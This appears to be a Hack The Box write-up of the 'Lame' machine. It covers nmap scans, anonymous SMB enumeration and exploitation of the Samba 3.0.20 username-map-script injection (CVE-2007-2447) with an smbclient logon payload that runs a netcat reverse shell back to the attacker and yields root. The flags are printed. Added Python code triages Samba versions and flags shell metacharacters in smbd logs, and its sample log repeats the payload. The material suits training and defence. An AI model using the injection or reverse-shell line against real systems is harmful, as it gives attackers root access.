Nmap TCP results

Nmap scan report for 10.10.10.3
Host is up, received user-set (0.092s latency).
Scanned at 2020-07-16 11:53:26 CEST for 258s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
| ssh-dss …
|   2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|broadband router|remote management|general purpose|storage-misc
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Arris embedded (92%), Dell embedded (92%), Dell iDRAC 6 (92%), ZyXEL embedded (92%), Belkin embedded (90%)
OS CPE: cpe:/o:linux:linux_kernel:2.4.30 cpe:/h:dell:remote_access_card:6 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware cpe:/h:zyxel:nsa-200 cpe:/h:belkin:n300
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), ZyXEL NSA-200 NAS device (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=7/16%OT=21%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5F102498%P=x86_64-pc-linux-gnu)
SEQ(SP=D0%GCD=1%ISR=CE%TI=Z%II=I%TS=7)
OPS(O1=M54BST11NW5%O2=M54BST11NW5%O3=M54BNNT11NW5%O4=M54BST11NW5%O5=M54BST11NW5%O6=M54BST11)
WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
ECN(R=Y%DF=Y%TG=40%W=16D0%O=M54BNNSNW5%CC=N%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 0.002 days (since Thu Jul 16 11:54:42 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h54m33s, deviation: 2h49m44s, median: -3d02h54m35s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 63867/tcp): CLEAN (Timeout)
|   Check 3 (port 22553/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-07-13T03:02:32-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   126.94 ms 10.10.16.1
2   79.17 ms  10.10.10.3

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 16 11:57:44 2020 -- 1 IP address (1 host up) scanned in 258.75 seconds

Nmap FTP scan results:

Nmap scan report for 10.10.10.3
Host is up, received user-set (0.094s latency).
Scanned at 2020-07-16 11:54:27 CEST for 23s

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 2.3.4
|_banner: 220 (vsFTPd 2.3.4)
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_sslv2-drown: 
Service Info: OS: Unix

SMB nmap results:

sudo nmap --reason -Pn -sV -p 445,139 --script=vuln --script-args=unsafe=1  10.10.10.3 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 12:22 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.3
Host is up, received user-set (0.059s latency).

PORT    STATE SERVICE     REASON         VERSION
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.35 seconds
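As an added triage example (not part of the writeup), the following Python script parses the PORT/STATE/SERVICE/VERSION table of nmap's normal output shown above and classifies the Samba banners against CVE-2007-2447, the bug exploited later in this post. The sample input is the port table from the TCP scan copied verbatim; the parser takes its column boundaries from the header line, so it also works for scans run without --reason or without -sV. The fact that the fix shipped in Samba 3.0.25 comes from the Samba advisory, not from this page.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List

# Sample input: the port table from the TCP scan above, reproduced verbatim
# (nmap normal output with --reason, so a REASON column is present).
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
"""

PORT_LINE = re.compile(r"^\d+/(tcp|udp)\s")
SAMBA_VERSION = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(rc\d+)?")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty when nmap printed no VERSION column or no version


def parse_port_table(text: str) -> List[PortEntry]:
    """Parse the port table of nmap normal output.

    Column offsets are read from the header line, so the REASON and VERSION
    columns are optional.  Script output ("|", "|_") and other chatter is skipped.
    """
    cols: Dict[str, int] = {}
    entries: List[PortEntry] = []
    for line in text.splitlines():
        if line.startswith("PORT ") and "STATE" in line:
            cols = {name: line.index(name)
                    for name in ("STATE", "SERVICE", "REASON", "VERSION")
                    if name in line}
            continue
        if not cols or not PORT_LINE.match(line):
            continue
        port_str, proto = line[:cols["STATE"]].strip().split("/")
        service_end = cols.get("REASON") or cols.get("VERSION") or len(line)
        version = line[cols["VERSION"]:].strip() if "VERSION" in cols else ""
        entries.append(PortEntry(
            port=int(port_str),
            proto=proto,
            state=line[cols["STATE"]:cols["SERVICE"]].strip(),
            service=line[cols["SERVICE"]:service_end].strip(),
            version=version,
        ))
    return entries


def samba_cve_2007_2447_status(version: str) -> str:
    """Classify an nmap Samba version string against CVE-2007-2447.

    The "username map script" injection was fixed in Samba 3.0.25 (Samba
    advisory, not from the writeup).  Returns:
      "unpatched" - exact 3.0.x below 3.0.25, or a 3.0.25 release candidate
      "patched"   - any other exact version (for this CVE only)
      "unknown"   - fuzzy banner such as "Samba smbd 3.X - 4.X"
    """
    m = SAMBA_VERSION.search(version)
    if not m:
        return "unknown"
    major, minor, patch = (int(g) for g in m.groups()[:3])
    rc = m.group(4)
    if (major, minor) == (3, 0) and (patch < 25 or (patch == 25 and rc)):
        return "unpatched"
    return "patched"


def triage_samba(text: str) -> List[Dict[str, object]]:
    """One finding per Samba service line: port, banner and CVE-2007-2447 status."""
    return [
        {"port": e.port, "version": e.version,
         "cve_2007_2447": samba_cve_2007_2447_status(e.version)}
        for e in parse_port_table(text)
        if "Samba" in e.version
    ]


if __name__ == "__main__":
    for f in triage_samba(SAMPLE_NMAP_OUTPUT):
        print(f"{f['port']}/tcp  {f['cve_2007_2447']:9}  {f['version']}")
```

On the scan above the 139/tcp banner is only a fuzzy range and comes back "unknown", while 445/tcp gives the exact 3.0.20-Debian string and is flagged "unpatched"; the version scan on both SMB ports is what makes the distinction possible.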

Exploring the Samba shares returns an error:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient -L //10.10.10.3  
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

To avoid this error, I added the following lines to smb.conf, in the [global] section:

client min protocol = CORE
client max protocol = SMB3

Now I can continue analyzing the Samba protocol and shares:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient -L //10.10.10.3  
Enter WORKGROUP\lillox's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk      
    IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            LAME

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient  //10.10.10.3/tmp     
Enter WORKGROUP\lillox's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

The Samba version is 3.0.20, so it could be vulnerable to CVE-2007-2447, a command injection through the "username map script" option. When that option is set, Samba hands the username supplied at SMB session setup to a shell script, so a username containing shell metacharacters gets those characters interpreted by the shell and arbitrary commands run on the device. No authentication is required because the mapping happens before the credentials are checked. First, we need to set up a listener on the attacker machine:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...

Then, in the smb session opened before, we issue a logon command whose username carries the payload that opens the reverse shell:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  smbclient  //10.10.10.3/tmp     
Enter WORKGROUP\lillox's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nc 10.10.16.106 8888 -e /bin/bash`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> 

Going back to the listener:

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.16.106] from (UNKNOWN) [10.10.10.3] 34382
id
uid=0(root) gid=0(root)

So we have a root shell and can find all the flags :)

➜ lillox@kalilloX  ~/Nextcloud/HackTheBox/machines/lame  nc -lvp 8888
listening on [any] 8888 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.16.106] from (UNKNOWN) [10.10.10.3] 34382
id
uid=0(root) gid=0(root)

find / -iname user.txt
/home/makis/user.txt
cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
cat /root/root.txt
92caac3be140ef409e45721348a4e9df
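From the defender's side, the session setup above fails on the server (the client only sees NT_STATUS_IO_TIMEOUT), so the attempt shows up in smbd's authentication log with the payload as the username. As an added detection example (not part of the writeup), the Python below scans smbd log lines for logon names that would be meaningful to a shell. The log format is assumed to be smbd's "Authentication for user [x] -> [y] FAILED" message and the sample lines are constructed, not taken from the machine; quote characters and backslash are deliberately not treated as indicators so that names like DOMAIN\user or o'brien do not produce noise. The real fix remains upgrading Samba or removing the "username map script" option; this is a compensating check.

```python
import re
from typing import List, Tuple

# Shell metacharacters that make a username meaningful to /bin/sh.  Quotes and
# backslash are left out on purpose: "DOMAIN\user" and "o'brien" are legitimate.
SHELL_METACHARS = ("`", "$(", ";", "|", "&", "<", ">", "\n")

# Assumed smbd message format for a failed session setup:
#   check_ntlm_password:  Authentication for user [<client name>] -> [<mapped name>] FAILED ...
AUTH_FAILURE = re.compile(
    r"Authentication for user \[(?P<client>.*?)\] -> \[(?P<mapped>.*?)\] FAILED"
)

# Constructed sample log lines (not from the box); the third attempt carries
# the same username the writeup sends with the smbclient "logon" command.
SAMPLE_SMBD_LOG = [
    "[2020/07/16 12:30:01,  2] auth/auth.c:319(check_ntlm_password)",
    "  check_ntlm_password:  Authentication for user [makis] -> [makis] FAILED with error NT_STATUS_WRONG_PASSWORD",
    "[2020/07/16 12:30:05,  2] auth/auth.c:319(check_ntlm_password)",
    "  check_ntlm_password:  Authentication for user [/=`nc 10.10.16.106 8888 -e /bin/bash`] -> [/=`nc 10.10.16.106 8888 -e /bin/bash`] FAILED with error NT_STATUS_NO_SUCH_USER",
    "[2020/07/16 12:31:10,  2] auth/auth.c:319(check_ntlm_password)",
    "  check_ntlm_password:  Authentication for user [WORKGROUP\\o'brien] -> [o'brien] FAILED with error NT_STATUS_NO_SUCH_USER",
    "[2020/07/16 12:31:40,  2] auth/auth.c:319(check_ntlm_password)",
    "  check_ntlm_password:  Authentication for user [guest;id] -> [guest;id] FAILED with error NT_STATUS_NO_SUCH_USER",
]


def shell_metachars_in(username: str) -> List[str]:
    """Return the shell metacharacters present in a logon name, in a fixed order."""
    return [c for c in SHELL_METACHARS if c in username]


def find_suspicious_logons(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (client username, metachars found) for every authentication
    attempt whose username would be interpreted by a shell.

    The username map script runs on the client-supplied name, so that is the
    field that matters; the mapped name is checked too so a mapping that
    introduces metacharacters is not missed.  One finding per log line.
    """
    hits: List[Tuple[str, List[str]]] = []
    for line in lines:
        m = AUTH_FAILURE.search(line)
        if not m:
            continue
        for name in (m.group("client"), m.group("mapped")):
            found = shell_metachars_in(name)
            if found:
                hits.append((m.group("client"), found))
                break
    return hits


if __name__ == "__main__":
    for username, chars in find_suspicious_logons(SAMPLE_SMBD_LOG):
        print(f"suspicious logon name {username!r}: shell metacharacters {chars}")
```

Run against the sample, the makis and o'brien attempts pass as ordinary failed logons, while the backtick payload and the ";"-separated name are reported; in practice the same check belongs in whatever log pipeline ingests smbd output, keyed on the client-supplied name.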

- lilloX
